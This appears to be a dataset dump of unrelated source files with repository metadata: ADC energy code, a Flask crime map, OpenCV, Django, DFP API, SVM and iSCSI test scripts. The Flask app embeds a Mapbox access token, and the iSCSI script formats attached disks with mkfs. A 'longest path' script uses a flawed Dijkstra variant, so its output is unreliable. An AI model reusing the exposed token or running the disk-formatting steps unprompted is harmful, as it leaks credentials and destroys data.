if switch == 'mcs':
if structure == 'conventional':
raise Exception(
'Conventional (single-ended) structure does not support merged capacitor switching.')
weights_ideal = np.concatenate(
([0.5 ** j for j in range(1, n)], [0.5 ** (n - 1)]))
cap_ideal = np.concatenate(
([2 ** (n - 2 - j) for j in range(n - 1)], [1]))
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# connection of bottom plates of positive and negative capacitor arrays.
# at the sampling phase, all the bottom plates are connected to Vcm
# = 0.5* Vref
cap_connect_p = np.full((n, n), 0.5)
cap_connect_n = np.full((n, n), 0.5)
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the v_x of both sides in each step, here the term v_ip and
# v_in are subtracted.
v_xp = np.zeros(n)
v_xn = np.zeros(n)
# store the voltage difference between the plates of each capacitor in each step, here the term v_ip- v_cm
# and v_in - v_cm are subtracted, because when calculating the change of v_cap, these terms are constant and
# so eliminated.
v_cap_p = np.zeros((n, n))
v_cap_n = np.zeros((n, n))
for k in range(1, n):
# update the connections of bottom plates
cap_connect_p[k:, k - 1], cap_connect_n[k:,
k - 1] = 1 - sw_process[k], sw_process[k]
v_xp[k] = np.inner(cap_connect_p[k], weights_ideal)
v_xn[k] = np.inner(cap_connect_n[k], weights_ideal)
# calculate the voltage across the top and bottom plates of
# capacitors
v_cap_p[k] = v_xp[k] - cap_connect_p[k]
v_cap_n[k] = v_xn[k] - cap_connect_n[k]
# find index of the capacitors connected to the reference
# voltage
c_tp_index = np.where(cap_connect_p[k] == 1.0)[0]
c_tn_index = np.where(cap_connect_n[k] == 1.0)[0]
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
sw_energy_p = - \
np.inner(cap_ideal[c_tp_index], (v_cap_p[k, c_tp_index] - v_cap_p[k - 1, c_tp_index]))
sw_energy_n = - \
np.inner(cap_ideal[c_tn_index], (v_cap_n[k, c_tn_index] - v_cap_n[k - 1, c_tn_index]))
sw_energy[k] = sw_energy_p + sw_energy_n
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
if switch == 'split':
coefficient = 1
if structure == 'differential':
coefficient = 2
if n < 2:
raise Exception(
"Number of bits must be greater than or equal to 2. ")
# capacitor array, cap_ideal has the shape of (2,n), in which the first row is the sub-capacitor array of the
# MSB capacitor, the second row is the main capacitor array(excluding
# the MSB capacitor)
cap_ideal = np.repeat(np.concatenate(
([2**(n - 2 - i) for i in range(n - 1)], [1]))[np.newaxis, :], 2, axis=0)
weights_ideal = cap_ideal / (2**n)
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the bottom plates connection in each step
cap_connect = np.repeat(
np.vstack(
(np.ones(n), np.zeros(n)))[
np.newaxis, :, :], n, axis=0)
# store the voltage at X point ,here the term v_cm - v_in is
# subtracted
v_x = np.zeros(n)
v_x[0] = np.sum(np.multiply(weights_ideal, cap_connect[0]))
# the voltage between top plates and bottom plates
v_cap = np.zeros((n, 2, n))
v_cap[0] = v_x[0] - cap_connect[0]
for k in range(1, n):
# if up-switching: the capacitor with index k-1 in the main capacitor array will be charged to V_ref,
# and the capacitor with same index remains charged to V_ref; if down-switching: the capacitor
# with index k-1 in the sub-capacitor array will be discharged to ground, and the capacitor with the
# same index remains discharged.
cap_connect[k:, :, k - 1] = sw_process[k]
v_x[k] = np.sum(np.multiply(weights_ideal, cap_connect[k]))
v_cap[k] = v_x[k] - cap_connect[k]
# find index of the capacitors charged to the reference
# voltage
c_t_index = np.where(
cap_connect[k] == 1.0) # 2-dimensional index
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
# attention that v_cap is a 3d-array, so the slicing index
# should also be 3-dimensional
sw_energy[k] = - np.inner(cap_ideal[c_t_index],
(v_cap[k,c_t_index[0],
c_t_index[-1]] - v_cap[k - 1, c_t_index[0], c_t_index[-1]]))
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
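# Added usage sketch (illustration only; assumes assistant_module is importable,
# as in the imports at the top of this file). Energies are in units of
# C0 * Vref^2 (unit capacitance times reference voltage squared).
if __name__ == '__main__':
    # Per-code switching energy of a 4-bit SAR ADC, conventional one-step
    # switching, single-ended structure.
    energies = get_energy(4, switch='conventional', structure='conventional')
    print('energy per code:', energies)
    print('average switching energy:', energies.mean())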
|
[
"lfc199471@gmail.com"
] |
lfc199471@gmail.com
|
f6e865c5110f9052fdbb39331313e2ca555771da
|
9e1f6ccb24740e5dc51c71b76ffc3df4f561453e
|
/app.py
|
4451f01d8c4e516275d05abca23045fda760067c
|
[] |
no_license
|
AbbieKent/Analyzing-Atlanta-Crime
|
2ed7ed191b757482c1d3f42fb96da53a921b09ee
|
872ecb801b1abec1f41dd732ee9d6f88d70f6072
|
refs/heads/main
| 2023-03-17T17:44:25.125117
| 2021-03-15T21:11:42
| 2021-03-15T21:11:42
| 348,123,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,506
|
py
|
from flask import Flask, render_template
from flask import request, url_for, render_template, redirect
import pandas as pd
import numpy as np
import pdb, os
from os import environ
import joblib
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import LabelEncoder
from platform import python_version
print(python_version())
# Create an instance of our Flask app.
app = Flask(__name__)
# Set route
@app.route('/')
def index():
print('STARTING! '*20)
mapbox_access_token = "pk.eyJ1IjoiZGF2aWRjb3kiLCJhIjoiY2tqcHU1YzBzOHY4ZjJxcWpkNGI5b2h2MSJ9.CsPttIW0Q41kP2uOBN6n8g"
# pdb.set_trace()
print(os.getcwd())
# df = pd.read_csv('./static/data/data.csv')
df = pd.read_csv('./static/data/data.csv')
#df = df.head(5)
return render_template('index.html', tables = [df.to_html(classes='female')],
titles=['IDKLOL'],
mapbox_access_token=mapbox_access_token)
@app.route('/neighborhood')
def neighborhood():
return render_template('neighborhood.html')
@app.route('/typesofcrimes')
def crime():
return render_template('crime.html')
@app.route('/timeofyear')
def year():
return render_template('Timeofyear.html')
@app.route('/contactinfo')
def contact():
return render_template('contactinfo.html')
@app.route('/index')
def homepage():
return render_template('index.html')
if __name__ == "__main__":
app.run(debug=True)
|
[
"arkent10@gmail.com"
] |
arkent10@gmail.com
|
b9f5b0e85ced88524ab8f2e59229df6b0f93c821
|
e60a342f322273d3db5f4ab66f0e1ffffe39de29
|
/parts/zodiac/chameleon/__init__.py
|
60fbbb344ac3c226ff2ca2148893e72d3fc26add
|
[] |
no_license
|
Xoting/GAExotZodiac
|
6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1
|
f60b2b77b47f6181752a98399f6724b1cb47ddaf
|
refs/heads/master
| 2021-01-15T21:45:20.494358
| 2014-01-13T15:29:22
| 2014-01-13T15:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 75
|
py
|
/home/alex/myenv/zodiac/eggs/Chameleon-2.13-py2.7.egg/chameleon/__init__.py
|
[
"alex.palacioslopez@gmail.com"
] |
alex.palacioslopez@gmail.com
|
91f2e963910d164e1fa3ecf41f3875ae6dd1b8e6
|
4fc5c908df8c0aecb4943e798c9c71c542a96584
|
/samples/practice1_Milana.py
|
3d038dea120dcb17d2a350f9b410f72a73b176fa
|
[
"Apache-2.0"
] |
permissive
|
Milana009/UNN_HPC_SCHOOL_2019_ML
|
84d51cdd7a499139a0297a76522350de74b7ff4c
|
d5bb7a8ab5f026f2bc4df896019ded5987040295
|
refs/heads/master
| 2020-09-13T07:58:32.456350
| 2019-11-19T23:04:02
| 2019-11-19T23:04:02
| 222,703,246
| 1
| 0
|
Apache-2.0
| 2019-11-19T13:31:23
| 2019-11-19T13:31:22
| null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
import sys
import cv2
import logging as log
import argparse
sys.path.append('../src')
from imagefilter import ImageFilter
def build_argparse():
parser=argparse.ArgumentParser()
parser.add_argument('-i', '--input', help = 'your input', type = str)
parser.add_argument('-w', '--width', help = 'your width', type = int)
parser.add_argument('-l', '--height', help = 'your height', type = int)
#
# Add your code here
#
return parser
def main():
log.basicConfig(format="[ %(levelname)s ] %(message)s", level=log.INFO, stream=sys.stdout)
log.info("Hello image filtering")
args = build_argparse().parse_args()
imagePath = args.input
log.info(imagePath)
image_source = cv2.imread(imagePath, 1)
log.info(image_source.shape)
myFilter = ImageFilter(gray = True, shape = (args.width, args.height))
image_final = myFilter.process_image(image_source)
cv2.imshow("Image", image_final)
cv2.waitKey(0)
cv2.destroyAllWindows()
#
# Add your code here
#
return
if __name__ == '__main__':
sys.exit(main())
|
[
"Milana_Vagapova"
] |
Milana_Vagapova
|
580dbd15bf43272f28e3f9bd42413a905510cd76
|
bef304291f5fe599f7a5b713d19544dc0cecd914
|
/todoapp/todo_list/forms.py
|
9fe1a617dd0f429fc6c8b3c1fa6885fee975c262
|
[] |
no_license
|
coderj001/django-todo-and-air-quality
|
9ca847143ea86677a0d54026c060638fabf8c042
|
012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3
|
refs/heads/master
| 2020-12-14T20:20:49.845722
| 2020-01-19T15:06:42
| 2020-01-19T15:06:42
| 234,855,834
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
class Meta:
model=ToDoList
fields=['item','completed']
|
[
"amirajubolchi001@gmail.com"
] |
amirajubolchi001@gmail.com
|
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9
|
7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a
|
/examples/adspygoogle/dfp/v201101/get_licas_by_statement.py
|
9086f2f5d7006a77c1a7b578138725bf4db3479b
|
[
"Apache-2.0"
] |
permissive
|
hockeyprincess/google-api-dfp-python
|
534519695ffd26341204eedda7a8b50648f12ea9
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
refs/heads/master
| 2021-01-10T10:01:09.445419
| 2011-04-14T18:25:38
| 2011-04-14T18:25:38
| 52,676,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,266
|
py
|
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
values = [{
'key': 'lineItemId',
'value': {
'xsi_type': 'NumberValue',
'value': line_item_id
}
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
filter_statement)[0]['results']
# Display results.
for lica in licas:
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
|
[
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] |
api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138
|
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py
|
18e84ab880631f7510539ae77e9524b0eda2b632
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 621
|
py
|
# represents a triangle
class Triangle(object):
_kinds=["equilateral","isosceles","scalene"]
def __init__(self,a,b,c):
if a<=0 or b<=0 or c<=0:
raise TriangleError("Triangles cannot have zero or negative side length.")
if a+b<=c or a+c<=b or b+c<=a:
raise TriangleError("Triangles must satisfy the triangle inequality.")
self.sides=sorted([a,b,c])
def kind(self):
return Triangle._kinds[len(set(self.sides))-1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
def __init__(self,message):
super(TriangleError,self).__init__(message)
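# Brief usage sketch (added for illustration; not part of the original exercise file):
# Triangle(3, 4, 5).kind()   # 'scalene'     - three distinct side lengths
# Triangle(2, 2, 3).kind()   # 'isosceles'   - exactly two sides equal
# Triangle(2, 2, 2).kind()   # 'equilateral' - all sides equal
# Triangle(1, 1, 3)          # raises TriangleError (violates the triangle inequality)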
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
6b2843c0a678ffe8be10b0d147adee1740dc58da
|
a5f8eb72e680a906f74ae53d2b6428fbb008320c
|
/31-zip.py
|
a48620bb23a58f1ecfdebf53d239f9cf71d077e5
|
[] |
no_license
|
arn1992/Basic-Python
|
0588858aed632ac9e65e5618d5b57bcbe71c45bc
|
09b9bf2364ddd2341f95445e18868e2e0904604d
|
refs/heads/master
| 2020-06-28T18:35:32.394730
| 2016-12-15T07:21:33
| 2016-12-15T07:21:33
| 74,483,622
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
first=['ratul','aminur','arn']
last=['tasneem','ishrar']
names=zip(first,last)
for a,b in names:
print(a,b)
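# Added note: zip() stops at the shorter sequence, so 'arn' above is never printed.
# A hedged alternative that keeps unmatched items would be itertools.zip_longest:
# from itertools import zip_longest
# for a, b in zip_longest(first, last, fillvalue=''):
#     print(a, b)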
|
[
"noreply@github.com"
] |
arn1992.noreply@github.com
|
9b500090e5537a2b729caa78d0590d8753bbca89
|
b92adbd59161b701be466b3dbeab34e2b2aaf488
|
/.c9/metadata/environment/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py
|
34ca1ee1bb0f47da7e80c5643b393f16129c97b8
|
[] |
no_license
|
R151865/cloud_9_files
|
7486fede7af4db4572f1b8033990a0f07f8749e8
|
a468c44e9aee4a37dea3c8c9188c6c06e91cc0c4
|
refs/heads/master
| 2022-11-22T10:45:39.439033
| 2020-07-23T09:31:52
| 2020-07-23T09:31:52
| 281,904,416
| 0
| 1
| null | 2022-11-20T00:47:10
| 2020-07-23T09:08:48
|
Python
|
UTF-8
|
Python
| false
| false
| 480
|
py
|
{"filter":false,"title":"api_wrapper.py","tooltip":"/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":17,"column":17},"end":{"row":17,"column":75},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1590407780811,"hash":"c7949160d2afabed4398d4df3013ec47e225082d"}
|
[
"r151865@rguktrkv.ac.in"
] |
r151865@rguktrkv.ac.in
|
8c933fd456834988004265d8cb6e1a7801ec7b35
|
b013eb7ffc0c41e874c04a55065de96a9313ab17
|
/longest_path1.py
|
f3d3b164a7b8e8b0244d280f07fd701a95f4287a
|
[] |
no_license
|
YuiGao/shortest_longest_path
|
69fcf5724cfb03e7a94f33b507fa25e7c41f69ed
|
111d85c2fa090b497cc2896ddf644a21ffc4e69f
|
refs/heads/master
| 2020-05-07T19:29:09.282219
| 2019-04-11T14:54:47
| 2019-04-11T14:54:47
| 180,815,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
nodes = ('A', 'B', 'C', 'D', 'E', 'F', 'G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
distances = {
'A':{'B':5,'C':6,'D':4,'E':7},
'B':{'A':5,'F':2,'G':3},
'C':{'A':6,'F':6,'G':4,'H':1},
'D':{'A':4,'G':7,'H':3,'I':6},
'E':{'A':7,'H':9,'I':1},
'F':{'B':2,'C':6,'J':2,'K':3},
'G':{'B':3,'C':4,'D':7,'J':6,'K':4,'L':1},
'H':{'C':1,'D':3,'E':9,'K':7,'L':3,'M':6},
'I':{'D':6,'E':1,'L':9,'M':7},
'J':{'F':2,'G':6,'N':2,'O':3},
'K': {'F': 3, 'G': 4, 'H': 7, 'N': 6, 'O': 4, 'P': 1},
'L': {'G': 1, 'H': 3, 'I': 9, 'O': 7, 'P': 10, 'Q': 6},
'M': {'H': 6, 'I': 7, 'P': 9, 'Q': 8},
'N': {'J': 2, 'K': 6, 'R': 2, 'S': 3},
'O': {'J': 3, 'K': 4, 'L': 7, 'R': 6, 'S': 4, 'T': 1},
'P': {'K': 1, 'L': 10, 'M': 9, 'S': 7, 'T': 3, 'U': 6},
'Q': {'L': 6, 'M': 8, 'T': 9, 'U': 1},
'R': {'N': 2, 'O': 6, 'V': 2, 'W': 3},
'S': {'N': 3, 'O': 4, 'P': 7, 'V': 6, 'W': 4, 'X': 1},
'T': {'O': 1, 'P': 3, 'Q': 9, 'W': 7, 'X': 3, 'Y': 6},
'U': {'P': 6, 'Q': 1, 'X': 9, 'Y': 1},
'V': {'R': 2, 'S': 6, 'Z': 5},
'W': {'R': 3, 'S': 4, 'T': 7, 'Z': 6},
'X': {'S': 1, 'T': 3, 'U': 9, 'Z': 4},
'Y': {'T': 6, 'U': 1, 'Z': 7},
'Z': {'V': 5, 'W': 6, 'X': 4, 'Y': 7}
}
unvisited = {node: None for node in nodes}  # None is used as "infinity"
visited = {}  # records nodes that have already been relaxed
current = 'A'  # find the path lengths from node A to every other node
currentDistance = 0
unvisited[current] = currentDistance  # the distance from A to itself is 0
while True:
for neighbour, distance in distances[current].items():
if neighbour not in unvisited: continue  # already relaxed, skip it
newDistance = currentDistance + distance  # candidate distance
if unvisited[neighbour] is None or unvisited[neighbour] < newDistance:  # still "infinity", or the new distance is longer than the stored one
unvisited[neighbour] = newDistance  # update the distance
visited[current] = currentDistance  # this node has been relaxed; record it
del unvisited[current]  # remove it from the unvisited dict
if not unvisited: break  # stop once every node has been relaxed
candidates = [node for node in unvisited.items() if node[1]]  # nodes with a tentative distance that are not yet relaxed
current, currentDistance = sorted(candidates, key = lambda x: x[1])[0]  # pick the node to relax next
if(current == "Z"):
print('Longest path length from Start to End:', currentDistance)
|
[
"1205319351@qq.com"
] |
1205319351@qq.com
|
d1877db7913e58c396ec934ebb1dc1c993bcbbb5
|
892dd32ee0be7135cd33c875b06dcc66307dcc99
|
/automation/MPTS/verifyIqn.py
|
b82a09a932deb898ea00bc911d3867e80a4c52da
|
[] |
no_license
|
cloudbytestorage/devops
|
6d21ed0afd752bdde8cefa448d4433b435493ffa
|
b18193b08ba3d6538277ba48253c29d6a96b0b4a
|
refs/heads/master
| 2020-05-29T08:48:34.489204
| 2018-01-03T09:28:53
| 2018-01-03T09:28:53
| 68,889,307
| 4
| 8
| null | 2017-11-30T08:11:39
| 2016-09-22T05:53:44
|
Python
|
UTF-8
|
Python
| false
| false
| 5,429
|
py
|
import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
#### if login successfull mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
executeCmd('fdisk /dev/%s < fdisk_response_file' %(device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
endTime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
else:
endTime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
|
[
"karthik.s@cloudbyte.com"
] |
karthik.s@cloudbyte.com
|
4327917009b231fd6cbcb15c547b3403e777d4b3
|
856762ba0c6c69f4b086689764fad0d019a50146
|
/图片颜色分割.py
|
9d7ada5b5d96e3196d6bf53313ed2f2350199158
|
[] |
no_license
|
JonathanScoot/Events
|
bc9ec0194a972fe677693a1a8bff7539ff474bbf
|
795442eb56345b876847ce3c32ea4ea0631ddfb9
|
refs/heads/master
| 2020-04-30T13:37:13.664734
| 2019-03-21T03:33:32
| 2019-03-21T03:33:32
| 176,863,623
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
import cv2
import numpy as np
cap = cv2.imread('/Users/wangjie/Desktop/road1.jpg', 0)
while True:
displayimage = cv2.imshow('road', cap)
k=cv2.waitKey(5) &0xFF
if k==27:
break
cv2.destroyAllWindows()
# cv2.line() needs at least an image, two endpoints, and a color, e.g.:
# cv2.line(cap, (0, 0), (100, 100), 255, 2)
|
[
"Jonathan@MacBook-Pro-2.lan"
] |
Jonathan@MacBook-Pro-2.lan
|
8d311b4049baf3cfb4d2c9c41c06f410bd88211c
|
74e6ea749db5e989dcec9e85a6dadab44b73a91e
|
/restserver1/quickstart/svm.py
|
5aaf952eb9b89fe62df47c84fe7b73d10361507e
|
[] |
no_license
|
torahss/restserver
|
94d373c31cc54aef32f3eeb24844c6c4af7be604
|
dadcb1c8c08b7af375bda3f9c2bca47a63a5b761
|
refs/heads/master
| 2023-02-02T12:48:38.672797
| 2020-12-21T12:50:16
| 2020-12-21T12:50:16
| 323,330,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
import pandas as pd
def svmRun(inputdata) :
data = pd.read_csv('/var/www/restserver/quickstart/train.csv', header=0, index_col=0, squeeze=True)
dataset = pd.DataFrame(data)
t_data = pd.read_csv('/root/Downloads/test.csv', header=0, index_col=0, squeeze=True)
t_data = pd.DataFrame(t_data)
tr_y = dataset.iloc[:,4]
tr_data = dataset.iloc[:, [0, 1, 2, 3]]
test_y = t_data.iloc[:,4]
t_data = t_data.iloc[:, [0, 1, 2, 3]]
svm = SVC(kernel='rbf',C=1.0, random_state=1, gamma=0.1)
svm.fit(tr_data,tr_y)
#print(inputdata[0][1])
y_pre_test = svm.predict(t_data)
t_data.iloc[1:2,0] = inputdata[0][0]
t_data.iloc[1:2, 1] = inputdata[0][1]
t_data.iloc[1:2, 2] = inputdata[0][2]
t_data.iloc[1:2, 3] = inputdata[0][3]
y_pred = svm.predict(t_data.iloc[1:2, ])
if y_pred[0] == 'Good' :
result = 0
elif y_pred[0] == 'Normal' :
result = 1
elif y_pred[0] == 'Bad':
result = 2
elif y_pred[0] == 'Worst':
result =3
print("Accuracy : %.2f" % accuracy_score(test_y, y_pre_test))
return result
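# Added usage sketch (hedged): the CSV paths above are hard-coded server paths, so
# this only runs where they exist. The argument is a single sample with the same
# four features used for training; the return value maps 0/1/2/3 to
# Good/Normal/Bad/Worst.
# print(svmRun([[5.1, 3.5, 1.4, 0.2]]))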
|
[
"sungsamhong@gmail.com"
] |
sungsamhong@gmail.com
|
431bab8eea3abbc7fae959c140647f6a74cb2440
|
a266cfe89cf9c7347abf712e3b800468438448c2
|
/extra_addons/formio_data_api/__manifest__.py
|
1449bd63251da49b08f0d9e19d5075ac17b82eaf
|
[] |
no_license
|
cialuo/project_template
|
db8b9f9c4115a6d44363a39e311363e8f3e7807f
|
2f875bdc5b730afeae3dd8dffafde852d0a44936
|
refs/heads/main
| 2023-03-09T17:50:55.398557
| 2021-02-24T00:17:59
| 2021-02-24T00:17:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
# Copyright Nova Code (http://www.novacode.nl)
# See LICENSE file for full licensing details.
{
'name': 'Forms | Data API',
'summary': 'Python API for Forms data (builder, form/submission).',
'version': '0.5',
'license': 'LGPL-3',
'author': 'Nova Code',
'website': 'https://www.novacode.nl',
'live_test_url': 'https://demo13.novacode.nl',
'category': 'Extra Tools',
'depends': ['formio'],
'data': [],
'external_dependencies': {
'python': ['formio-data'],
},
'application': False,
'images': [
'static/description/banner.gif',
],
'description': """
Forms | Data API
================
"""
}
|
[
"dungth@trobz.com"
] |
dungth@trobz.com
|
d115bee72cd6afec3acc95c9eb09d4221573f345
|
9abebf3d5b197a20a16829035e8d3623220c7822
|
/Chapter3/BigOListIndex.py
|
d355aab09621e3116e41f59a31b87c89427a2f5c
|
[] |
no_license
|
JoeVentrella/CS260
|
61e4e834f6c767d80cfe1e19460168f707e15bcd
|
a717f4b476b6e80f25cd74c8effc343624ec9b42
|
refs/heads/master
| 2020-08-08T04:19:33.906563
| 2019-12-15T01:54:40
| 2019-12-15T01:54:40
| 213,710,821
| 0
